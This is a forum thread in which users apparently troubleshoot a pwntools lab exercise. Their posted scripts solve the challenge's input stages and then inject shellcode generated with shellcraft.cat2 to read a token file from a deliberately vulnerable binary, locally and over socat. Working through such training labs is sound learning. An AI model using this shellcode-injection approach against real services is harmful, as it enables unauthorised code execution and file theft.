Bronze I
Bronze II'm having real difficulties with this one. if I run it locally on my host, I am able to return my own token but I get a seg fault. If I then move it across to remote using socat I do not get the token returned. This is what I have:
from pwn import *
import re
context.arch = 'amd64'
context.os = 'linux'
def main():
r_tube = process("/opt/demonstrate-challenge")
r_tube.recvuntil(b"The output may not display correctly in a terminal, so it may be safer to print it as a hexdump.")
shellcode = shellcraft.cat2('/home/token-user/token.txt', 1, 40) + shellcraft.ret(0)
shellcode = asm(shellcode)
r_tube.send(shellcode)
data = r_tube.recvall(5)
print(hexdump(data))
if __name__ == "__main__":
main()
I've tried the shell code in every which way and as I say I can get it locally but not remote, trying to run it on socat through my dev box it fails as well so I suspect it's something with socat that's not working as I expect. Wouldn't mind a nudge as I've spent a few months on and off on this to no avail.
Bronze IIII think there is some steps missing in your code. Go up take the provided code and make the adjustments in the replies and it should work.
Bronze IThanks for coming back to me, sorry I removed some of the steps for brevity but this is the full code that works fine locally but not though the remote connection:
from pwn import *
import re
context.arch = 'amd64'
context.os = 'linux'
def main():
r_tube = process("/opt/demonstrate-challenge")
#r_tube = remote("127.0.0.1", 1234)
print("Stage 1")
r_tube.recvuntil(b"What is the sum of")
line = r_tube.recvline().decode()
nums = [int(x) for x in line.strip().replace('?', '').split(' and ')]
answer = nums[0] + nums[1]
r_tube.sendline(str(answer).encode())
print("Stage 2")
r_tube.recvuntil(b':')
r_tube.recvline()
line = r_tube.recvline().decode().strip()
val1, val2 = [int(x) for x in line.split(" and ")]
packed = p32(val1) + p32(val2)
r_tube.send(packed)
print("Stage 3")
elf = ELF('/opt/demonstrate-challenge')
parsing_check_addr = elf.symbols['parsing_check']
r_tube.sendline(str(parsing_check_addr))
print("Stage 4")
shellcode = shellcraft.cat2('/home/token-user/token.txt', 1, 40) + shellcraft.ret(0)
shellcode = asm(shellcode)
r_tube.send(shellcode)
data = r_tube.recvall(5)
print(hexdump(data))
if __name__ == "__main__":
main()Again I get a SegFault with this and copying the code above I get a SegFault too and both of which provide the token.txt locally but not through the remote connection.
Bronze IIIOkay :) For me the following worked (just a part):
# Generate shellcode to read the file using pwntools shellcraft
context.arch = "amd64"
# Generate shellcode using shellcraft to read file and print the content as hex
shellcode = asm(shellcraft.cat2("/home/token-user/token.txt"))
# Print out the shellcode in hexadecimal for easy inspection
print("Generated Shellcode:")
print(shellcode.hex()) # Print shellcode in hex format for debugging
# Send the shellcode payload
conn.sendline(shellcode)I tried a lot of different approaches until i found this one. try it out.
It is the arch and an easier shellcode generation.
Bronze IOk my brain hurts! Running that code locally on my machine through Socat or through spawning a local process, nothing. However, when running it in the Immersive Lab environment, I get the token back. At least others have been able to work that out. Thanks completed PwnTools now.
Silver III had to use encode to get rid of tab, space and other characters.
